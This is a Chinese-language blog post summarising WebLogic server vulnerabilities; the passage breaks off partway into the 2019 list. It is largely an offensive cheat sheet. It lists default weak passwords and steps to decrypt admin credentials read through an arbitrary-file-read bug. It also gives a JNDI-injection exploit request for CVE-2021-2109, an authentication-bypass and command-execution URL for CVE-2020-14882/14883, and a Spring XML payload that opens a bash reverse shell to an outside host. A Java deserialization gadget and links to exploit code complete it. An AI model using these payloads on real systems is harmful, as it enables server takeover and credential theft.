<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="weblogic漏洞总结">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>weblogic漏洞总结 | Ex1t</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Ex1t" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ex1t</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ex1t</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">weblogic漏洞总结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/weblogic/">
                                <span class="chip bg-color">weblogic</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-08-02
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-08-02
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    25 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="一、Weblogic-介绍"><a href="#一、Weblogic-介绍" class="headerlink" title="一、Weblogic 介绍"></a>一、Weblogic 介绍</h1><p>​        WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。</p>
<h1 id="二、漏洞相关"><a href="#二、漏洞相关" class="headerlink" title="二、漏洞相关"></a>二、漏洞相关</h1><h2 id="2-1、已收集漏洞"><a href="#2-1、已收集漏洞" class="headerlink" title="2.1、已收集漏洞"></a>2.1、已收集漏洞</h2><pre class="line-numbers language-none"><code class="language-none">Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
Weblogic RCE CVE-2020-14882&amp;14883
weblogic jndi注入CVE-2020-14841
Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644)
WebLogic UniversalExtractor反序列化漏洞 CVE-2020-14645
WebLogic CVE-2020-14756 T3IIOP反序列化RCE
Weblogic 远程代码执行漏洞 CVE-2020-2883
Weblogic CVE-2020-2551 IIOP协议反序列化rce 
Weblogic反序列化漏洞 CVE-2019-2890
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
Weblogic反序列化漏洞 CVE-2019-2729
Weblogic任意文件读取漏洞（CVE-2019-2615)）
Weblogic 文件上传漏洞（CVE-2019-2618）
weblogic 反序列化漏洞 CVE-2018-3252
Weblogic反序列化远程代码执行漏洞 CVE-2018-3245
Weblogic远程代码执行漏洞 CVE-2018-3191
Weblogic任意文件上传漏洞（CVE-2018-2894）
Weblogic WLS核心组件反序列化漏洞 CVE-2018-2893
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628
WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）
Weblogic 反序列化漏洞 CVE-2017-3506
Weblogic 反序列化漏洞 CVE-2017-3248
Weblogic SSRF漏洞 CVE-2014-4210<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="2-2、weblogic漏洞扫描工具"><a href="#2-2、weblogic漏洞扫描工具" class="headerlink" title="2.2、weblogic漏洞扫描工具"></a>2.2、weblogic漏洞扫描工具</h2><p><a target="_blank" rel="noopener" href="https://github.com/0xn0ne/weblogicScanner">https://github.com/0xn0ne/weblogicScanner</a></p>
<p>可以检测以下漏洞</p>
<pre class="line-numbers language-none"><code class="language-none">weblogic administrator console、CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="2-3、常用弱口令"><a href="#2-3、常用弱口令" class="headerlink" title="2.3、常用弱口令"></a>2.3、常用弱口令</h2><pre class="line-numbers language-none"><code class="language-none">weblogic    Oracl@123
weblogic	weblogic
guest		guest
portaladmin	portaladmin
admin		security
joe	       	password
mary		password
system		security
wlcsystem	wlcsystem
wlcsystem	sipisystem
system    	password<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="2-4、通过任意文件读取来获取weblogic账号密码"><a href="#2-4、通过任意文件读取来获取weblogic账号密码" class="headerlink" title="2.4、通过任意文件读取来获取weblogic账号密码"></a>2.4、通过任意文件读取来获取weblogic账号密码</h2><p>假设通过以下可读取文件</p>
<pre class="line-numbers language-none"><code class="language-none">http://192.168.1.15:7001/hello/file.jsp?path=/etc/passwd<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml</p>
<p>SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，右键copy to file就可以保存成一个文件：</p>
<p><img src="https://img.ex1t.xyz//weblogic-xz1.png" alt="weblogic-xz1"></p>
<p>密文获取</p>
<p>config.xml是base_domain的全局配置文件，找到其中的的值，即为加密后的管理员密码</p>
<p><img src="https://img.ex1t.xyz//weblogic-xz2.png" alt="weblogic-xz2"></p>
<p>解密密文即可</p>
<p>解密工具</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h1 id="三、Weblogic-CVE漏洞"><a href="#三、Weblogic-CVE漏洞" class="headerlink" title="三、Weblogic-CVE漏洞"></a>三、Weblogic-CVE漏洞</h1><p>按照年份分下类</p>
<h2 id="3-1、2021年"><a href="#3-1、2021年" class="headerlink" title="3.1、2021年"></a>3.1、2021年</h2><pre class="line-numbers language-none"><code class="language-none">Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-1-1、CVE-2021-2109（Weblogic-LDAP-远程代码执行漏洞-）"><a href="#3-1-1、CVE-2021-2109（Weblogic-LDAP-远程代码执行漏洞-）" class="headerlink" title="3.1.1、CVE-2021-2109（Weblogic LDAP 远程代码执行漏洞 ）"></a>3.1.1、CVE-2021-2109（Weblogic LDAP 远程代码执行漏洞 ）</h3><h4 id="（1）、介绍"><a href="#（1）、介绍" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。</p>
<h4 id="（2）、影响版本"><a href="#（2）、影响版本" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用"><a href="#（3）、利用" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>下载工具(用于 JNDI注入 利用)：</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>执行</p>
<pre class="line-numbers language-none"><code class="language-none">java -jar JNDIExploit-v1.11.jar -i 192.168.204.131<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>exp执行ls命令</p>
<pre class="line-numbers language-none"><code class="language-none">POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&amp;_nfpb=true&amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
 
Host: 192.168.204.131:49163
 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 
Accept-Language: en-US,en;q=0.5
 
Accept-Encoding: gzip, deflate
 
Connection: close
 
cmd:ls
 
Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826
 
Upgrade-Insecure-Requests: 1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="3-2、2020年"><a href="#3-2、2020年" class="headerlink" title="3.2、2020年"></a>3.2、2020年</h2><pre class="line-numbers language-none"><code class="language-none">Weblogic RCE CVE-2020-14882&amp;14883
weblogic jndi注入CVE-2020-14841
Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644)
WebLogic UniversalExtractor反序列化漏洞 CVE-2020-14645
WebLogic CVE-2020-14756 T3IIOP反序列化RCE
Weblogic 远程代码执行漏洞 CVE-2020-2883
Weblogic CVE-2020-2551 IIOP协议反序列化rce <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-2-1、-CVE-2020-14882-amp-14883（Weblogic-RCE）"><a href="#3-2-1、-CVE-2020-14882-amp-14883（Weblogic-RCE）" class="headerlink" title="3.2.1、 CVE-2020-14882&amp;14883（Weblogic RCE）"></a>3.2.1、 CVE-2020-14882&amp;14883（Weblogic RCE）</h3><h4 id="（1）、介绍-1"><a href="#（1）、介绍-1" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。</p>
<h4 id="（2）、影响版本-1"><a href="#（2）、影响版本-1" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-1"><a href="#（3）、利用-1" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>​        CVE-2020-14882：允许未授权的用户绕过管理控制台的权限验证访问后台</p>
<p>​        远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console。</p>
<p>​        访问以下URL，未授权访问到管理后台页面（低权限的用户）：</p>
<pre class="line-numbers language-none"><code class="language-none">http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p> <img src="https://img.ex1t.xyz//CVE-2020-14882-1.png" alt="CVE-2020-14882-1"></p>
<p>目前是低权限用户，无法安装用户</p>
<p>CVE-2020-14883：允许后台任意用户通过HTTP协议执行任意命令</p>
<p>方法1</p>
<p>直接代码执行，创建文件</p>
<pre class="line-numbers language-none"><code class="language-none">127.0.0.1:70001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&amp;_pageLabel=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/123');")<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>方法2</p>
<p>构建一个恶意的xml文件放在能访问到的web服务器上</p>
<pre class="line-numbers language-none"><code class="language-none">&lt;beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;
&lt;bean id="pb" class="java.lang.ProcessBuilder" init-method="start"&gt;
&lt;constructor-arg&gt;
&lt;list&gt;
&lt;value&gt;-c&lt;/value&gt;
&lt;value&gt;/bin/bash&lt;/value&gt;
&lt;value&gt;&lt;![CDATA[bash -i &gt;&amp; /dev/tcp/1.1.1.1/8888 0&gt;&amp;1]]&gt;&lt;/value&gt;
&lt;/list&gt;
&lt;/constructor-arg&gt;
&lt;/bean&gt;
&lt;/beans&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>放在</p>
<pre class="line-numbers language-none"><code class="language-none">http://1.1.1.1/rce.xml<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>执行后进行反弹</p>
<pre class="line-numbers language-none"><code class="language-none">http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&amp;_pageLabel=&amp;handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://1.1.1.1/rce.xml")<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-2-2、CVE-2020-14841（weblogic-jndi注入）"><a href="#3-2-2、CVE-2020-14841（weblogic-jndi注入）" class="headerlink" title="3.2.2、CVE-2020-14841（weblogic jndi注入）"></a>3.2.2、CVE-2020-14841（weblogic jndi注入）</h3><h4 id="（1）、介绍-2"><a href="#（1）、介绍-2" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        参考文章</p>
<pre class="line-numbers language-none"><code class="language-none">https://www.77169.net/html/270571.html<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="（2）、影响版本-2"><a href="#（2）、影响版本-2" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-2"><a href="#（3）、利用-2" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>POC</p>
<pre class="line-numbers language-none"><code class="language-none">// JdbcRowSetImpl
       JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
       jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");

       MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
       methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
       methodAttributeAccessor.setIsWriteOnly(true);
       methodAttributeAccessor.setAttributeName("UnicodeSec");


       LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");

       final ExtractorComparator comparator = new ExtractorComparator(extractor);
       final PriorityQueue&lt;Object&gt; queue = new PriorityQueue&lt;Object&gt;(2, comparator);


       Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
       Reflections.setFieldValue(queue, "queue", q);
       Reflections.setFieldValue(queue, "size", 2);

       Field comparatorF = queue.getClass().getDeclaredField("comparator");
       comparatorF.setAccessible(true);
       comparatorF.set(queue, new ExtractorComparator(extractor));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-2-3、-CVE-2020-14756（WebLogic-T3IIOP反序列化RCE）"><a href="#3-2-3、-CVE-2020-14756（WebLogic-T3IIOP反序列化RCE）" class="headerlink" title="3.2.3、 CVE-2020-14756（WebLogic T3IIOP反序列化RCE）"></a>3.2.3、 CVE-2020-14756（WebLogic T3IIOP反序列化RCE）</h3><h4 id="（1）、介绍-3"><a href="#（1）、介绍-3" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        无</p>
<h4 id="（2）、影响版本-3"><a href="#（2）、影响版本-3" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">未找到<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/Y4er/CVE-2020-14645<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="（3）、利用-3"><a href="#（3）、利用-3" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><h3 id="3-2-4、CVE-2020-14645（WebLogic-UniversalExtractor反序列化漏洞）"><a href="#3-2-4、CVE-2020-14645（WebLogic-UniversalExtractor反序列化漏洞）" class="headerlink" title="3.2.4、CVE-2020-14645（WebLogic UniversalExtractor反序列化漏洞）"></a>3.2.4、CVE-2020-14645（WebLogic UniversalExtractor反序列化漏洞）</h3><h4 id="（1）、介绍-4"><a href="#（1）、介绍-4" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        攻击者可利用该漏洞实现远程代码执行。该反序列化的gadget存在与coherence包中。</p>
<h4 id="（2）、影响版本-4"><a href="#（2）、影响版本-4" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.2.1.4.0
12.2.1.3.0
12.1.3.0.0
14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-4"><a href="#（3）、利用-4" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/Y4er/CVE-2020-14645<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-2-5、CVE-2020-14644-Weblogic-coherence组件iiop反序列化漏洞"><a href="#3-2-5、CVE-2020-14644-Weblogic-coherence组件iiop反序列化漏洞" class="headerlink" title="3.2.5、CVE-2020-14644 (Weblogic coherence组件iiop反序列化漏洞)"></a>3.2.5、CVE-2020-14644 (Weblogic coherence组件iiop反序列化漏洞)</h3><h4 id="（1）、介绍-5"><a href="#（1）、介绍-5" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>参考文章</p>
<pre class="line-numbers language-none"><code class="language-none">https://www.cnblogs.com/potatsoSec/p/13451993.html<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="（2）、影响版本-5"><a href="#（2）、影响版本-5" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">12.2.1.3.0
12.1.3.0.0
14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-5"><a href="#（3）、利用-5" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/potats0/cve_2020_14644<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-2-6、CVE-2020-2883（Weblogic-远程代码执行漏洞-）"><a href="#3-2-6、CVE-2020-2883（Weblogic-远程代码执行漏洞-）" class="headerlink" title="3.2.6、CVE-2020-2883（Weblogic 远程代码执行漏洞 ）"></a>3.2.6、CVE-2020-2883（Weblogic 远程代码执行漏洞 ）</h3><h4 id="（1）、介绍-6"><a href="#（1）、介绍-6" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        Weblogic 默认开启 T3 协议，攻击者可利用T3协议进行反序列化漏洞实现远程代码执行。</p>
<h4 id="（2）、影响版本-6"><a href="#（2）、影响版本-6" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-6"><a href="#（3）、利用-6" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-2883_cmd.py<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-2-7、CVE-2020-2551（Weblogic-IIOP协议反序列化rce-）"><a href="#3-2-7、CVE-2020-2551（Weblogic-IIOP协议反序列化rce-）" class="headerlink" title="3.2.7、CVE-2020-2551（Weblogic  IIOP协议反序列化rce ）"></a>3.2.7、CVE-2020-2551（Weblogic  IIOP协议反序列化rce ）</h3><h4 id="（1）、介绍-7"><a href="#（1）、介绍-7" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        漏洞依然是由于调用远程对象的实现存在缺陷，导致序列化对象可以任意构造，在使用之前未经安全检查，导致恶意代码被执行。</p>
<h4 id="（2）、影响版本-7"><a href="#（2）、影响版本-7" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-7"><a href="#（3）、利用-7" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/Y4er/CVE-2020-2551<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="3-3、2019"><a href="#3-3、2019" class="headerlink" title="3.3、2019"></a>3.3、2019</h2><pre class="line-numbers language-none"><code class="language-none">Weblogic反序列化漏洞 CVE-2019-2890
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
